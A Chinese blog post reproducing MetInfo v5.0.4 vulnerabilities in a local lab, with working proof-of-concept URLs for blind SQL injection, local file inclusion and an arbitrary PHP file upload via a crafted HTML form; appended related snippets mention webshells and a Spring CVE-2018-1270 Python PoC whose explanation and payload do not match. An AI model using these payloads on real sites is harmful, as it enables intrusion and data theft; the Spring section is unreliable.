metinfov5.0.4漏洞复现

最新推荐文章于 2025-04-17 09:11:19 发布
最新推荐文章于 2025-04-17 09:11:19 发布
阅读量3.9k 收藏 6
点赞数 3
分类专栏: 网络安全
转载请保留出处,更多干货请关注微信公众号,句芒实验室,感谢!
本文链接:https://blog.csdn.net/Key_book/article/details/80604830
版权

metinfov5.0.4漏洞复现

最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞.
简单讲就是用户传进去的值变成了一个新的变量覆盖了原代码的变量,从而被我们利用.
产生的原因是因为编程人员在进行变量传值时,使用了双(“$$”)符号 .

下面开始漏洞复现

测试环境:
phpstudy #一个集成环境包含php+mysql
php源码(cms)
metinfov5.0.4 #源码大家可以去网上下载

测试目标:
三个经典漏洞:
SQLi(注入)
文件包含
文件上传

漏洞位置:
SQLi 注入漏洞位置:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22

POC:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22 and if(ord(substr(database(),1,1))=109,sleep(5),0) –+

此处采用盲注,POC的语句解释为,首先获取数据库名称,然后截取第一个字符,将截取到的字符转换为ASCII码与猜想的ASCII码做比较,如果满足条件,也是说我们猜想正确,沉睡5秒,以此来爆出库名,之后以此类推,爆表,字段,内容等等,当我们得到第一个字符后,我们可以进入数据库和我们的库名进行比较,发现第一个字符一致,证明注入成功.

文件包含漏洞位置:
http://localhost/metinfoV5.0.4/about/index.php

POC: http://localhost/metinfoV5.0.4/about/index.php?fmodule=7&module=../../phpinfo.php

为了帮助我们更好的理解,我们可以先在www目录下写一个phpinfo.php的文件,接着使用文件包含进行打开,发现成功打开,证明了此处存在文件包含漏洞.

文件上传漏洞位置:
http://localhost/metinfoV5.0.4/admin/include/uploadify.php

POC:
http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp

为了便于利用,我们把它写成一个HTML文件: 

<meta charset="utf-8">
<form
    enctype="multipart/form-data"
    method="post"
    name="myfrom"
    action="http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp"
>
    <input name="Filedata" type="file" size=20>
    <input type="submit" name="Submit" value="提交信息">
</form>

之后我们只要打开写好的html文件选择.php格式的文件上传就可以了!上传成功后,我们进入该网站的upload/file/目录下,发现我们的上传文件,证明,文件上传漏洞实现.

到此,漏洞复现基本完成,剩下的就是漏洞产生的原因了,由于时间有限,就不一一分析原因了,大家有兴趣的可以去分析源代码,来找出产生的原因.

metinfo_5.0.4 任意文件本地包含漏洞复现(metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 729
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
Metinfo_5.0.4 布尔盲注漏洞复现以及exp编写
oyqsb的博客
07-22 269
布尔盲注一般适用于页面没有回显字段,但页面回显有True 或者 false两种情况,利用and,or等关键字来构造SQL语句,再利用页面返回true或false来判断是否执行成功,从而达到注入的目的来获取信息。利用and 1=1 和 1=2 判断出布尔盲注。利用length函数判断出数据库长度为11。
weblogic漏洞复现(一)
最新发布
m0_67170526的博客
04-17 794
weblogic是是Oracle 公司开发的企业级 Java EE(现 Jakarta EE)应用服务器,主要用于部署和管理分布式、高可用的企业级应用。(个人感觉和tomcat差不多)
metinfo_5.0.4_filein-Include漏洞复现
m0_64583632的博客
02-06 452
metinfo_5.0.4_filein-Include漏洞复现
metinfo 5.0.4 文件上传漏洞复现
agrilly的博客
07-24 650
metinfo 、文件上传、漏洞、一句话木马
[漏洞复现] MetInfo5.0.4文件包含漏洞
Da1NtY的博客
06-28 563
漏洞出现在中,因为利用了动态地址,所以存在漏洞漏洞检查语句(!
metinfo_5.0.4_file-upload
weixin_43886198的博客
12-21 1382
metinfo_5.0.4_file-upload 漏洞描述 MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞漏洞危害等级 高危 影响版本 5.0.4 漏洞复现 基础环境 组件 版本 OS Windows 2008 R2 x64 Web Server phpStudy 2016(特别版) Source Code MetInfoV5.0.4 漏洞演示 本地构造HTML 表单,进行文件上传 变量覆盖,SQL注入(# %23),双写绕过。
[漏洞复现]metinfo5.0.4文件包含
feigerger的博客
08-31 205
metinfo5.0.4文件包含漏洞复现
【文件包含】metinfo 5.0.4 文件包含漏洞复现
wj33333的博客
11-15 448
​MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4版本中的/metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网站上的敏感文件。
metinfo_5.0.4_lfi
qq_45212316的博客
01-18 537
fmodule=7&module=c://windows/system32/drivers/etc/hosts】,此时我们已经改变了$module的值,其值为hosts文件的绝对路径。搜索fmodule 变量,发现只有当 fmodule 变量,发现只有当fmodule变量,发现只有当fmodule!发现输出了我们传进去的module的参数,所以接下来配合远程包含,上传图片马,在图片马里加入代码。如何证明该漏洞是文件包含漏洞,如果在执行命令后PHP代码执行了,那么就是文件包含漏洞。尝试输出$module。
冠龙科技企业网站管理系统
12-06
冠龙科技企业建站系统CMS是基于ASP开发的一套网络管理系统,正常使用该系统您必须保证您的服务器满足如下要求: 1) 软件系统:WIN2000+IIS5.0 / WINXP+IIS5.1 / WIN2003+IIS6.0 2) 数 据 库:Access2000 3) 其 他:服务器必须安装 微软IE浏览器5.0或以上版本 使用Email功能,需要安装Jmail 4.0或以上版本 部分功能需要服务器支持FSO(FileSystemObject) 推荐:Windows 2000+IIS5.0+Access2000+IE5.5环境测试
metinfo 5.0.4 文件包含漏洞复现
一个努力学习网安的小牛马
11-15 328
metinfo cms 版本 5.0.4
漏洞复现】Metinfo5.0.4任意文件包含漏洞复现
过期的秋刀鱼
11-04 850
文件夹中有个新建文件shell.php,即可用蚁剑连接。下放入一张没有木马的图片,使用另一种方式制作图片木马。,当我们直接包含图片的时候,这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是,在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。,然后在下面写入php代码,点击send。上传图片木马,通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败,拿到webshell。
Metlnfo CMS全版本漏洞收集
weixin_30360497的博客
08-24 733
根据https://www.seebug.org/appdir/MetInfo进行书写。 [版本:Metlnfo 4.0] 漏洞标题:Metlnfo cms任意用户密码修改 漏洞文件:member/save.php 85-111行代码: if($action=="editor"){ $query = "update $met_admin_table SET...
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 2073
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
MetInfo5.0文件包含漏洞
weixin_56537388的博客
08-31 987
我们来看到这个index.php,如下图所示,其中定义了fmodule变量与module变量,其中require_once语句表示将某个文件引入当前文件,在这个代码中,通过require_once引入了module.php,并且最后引入了module变量,这就是文件包含的入口,如果我们能控制module的值,就很可能存在文件包含漏洞。文件包含还有一个问题,如果还存在文件上传漏洞,那么甚至可以利用文件包含执行图片马,include会自动执行图片中的PHP语句。严格过滤被包含文件的路径;尽量少的使用动态包含;
metinfo_5.0.4 布尔盲注 exp
weixin_51559599的博客
11-08 327
提取码:dx2o。
如何修复php网站漏洞
网站漏洞修复专家
04-08 3910
近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数据库,以及后端服务器进行攻击,该metinfo漏洞影响版本较为广泛,metinfo6.1.0版本,metinfo 6.1.3版本,metinfo 6.2.0都会受到该网站漏洞的攻击。 metinfo...
spring-CVE-2018-1270漏洞复现
03-17
### Spring CVE-2018-1270 漏洞复现教程 #### 背景介绍 Spring Framework 是一个广泛使用的 Java 开发框架,提供了丰富的功能来简化企业级应用开发。然而,在某些版本中存在安全漏洞,可能导致远程代码执行 (RCE) 的风险。CVE-2018-1270 就是一个典型的例子,它存在于 `org.springframework.messaging` 包中的 `Http invoker request deserialization` 功能中。 该漏洞允许攻击者通过发送恶意序列化的 HTTP 请求数据包触发 RCE 攻击[^4]。 --- #### 影响范围 此漏洞影响以下版本: - **Spring Framework 5.05.0.4** - **Spring Framework 4.3 到 4.3.14** 不受影响的修复版本为: - **5.0.x 用户应升级至 5.0.5** - **4.3.x 用户应升级至 4.3.15** --- #### 漏洞原理 当应用程序启用了基于 XML 或 JSON 的反序列化机制时,如果未正确验证输入的数据,则可能被利用来进行任意代码执行。具体来说,`AbstractRemoteInvocationHandler` 类会尝试解析传入的消息并调用目标对象的方法。由于缺乏严格的类型检查,攻击者可以注入恶意 payload 来实现远程命令执行[^3]。 --- #### 复现环境搭建 为了重现此漏洞,通常需要准备如下工具和资源: 1. **Docker 容器**: 使用 vulhub 提供的标准镜像快速部署测试环境。 2. **POC 工具**: 编写或下载可用的 Proof of Concept (PoC) 脚本用于模拟攻击行为。 以下是具体的步骤说明: ##### 步骤一:安装 Docker 和 Compose 确保本地机器上已经安装好 Docker 及其扩展组件 docker-compose。 ##### 步骤二:拉取漏洞演示镜像 运行以下命令获取官方提供的漏洞实验场景: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/spring/CVE-2018-1270/ docker-compose up -d ``` 等待服务启动完成后访问地址确认正常工作状态。 ##### 步骤三:编写 PoC 测试脚本 下面展示了一个简单的 Python 实现方式作为参考案例之一: ```python import requests url = "http://localhost:8080/" payload = { 'exploit': '''T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')''' } try: response = requests.post(url, data=payload) print(response.text) except Exception as e: print(f"Error occurred: {e}") ``` 上述代码片段试图向服务器提交一段能够触碰文件 `/tmp/success` 的指令以证明控制权已被夺取成功与否可通过查看是否存在指定路径下的标记文件得知结果如何。 --- #### 验证效果 一旦完成以上操作流程之后再次登录容器内部检验预期成果是否达成即观察是否有新生成的目标文档出现表明整个过程顺利完成无误: ```bash docker-compose exec spring bash ls /tmp/ # 应能看到 success 文件 ``` --- #### 总结建议 针对此类高危级别的缺陷应当及时采取措施加以防范比如尽快迁移到最新稳定发行版或者关闭不必要的网络接口减少暴露面从而降低遭受潜在威胁的可能性同时也要定期审查第三方依赖库的安全公告以便第一时间响应相应更新通知。 ---
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值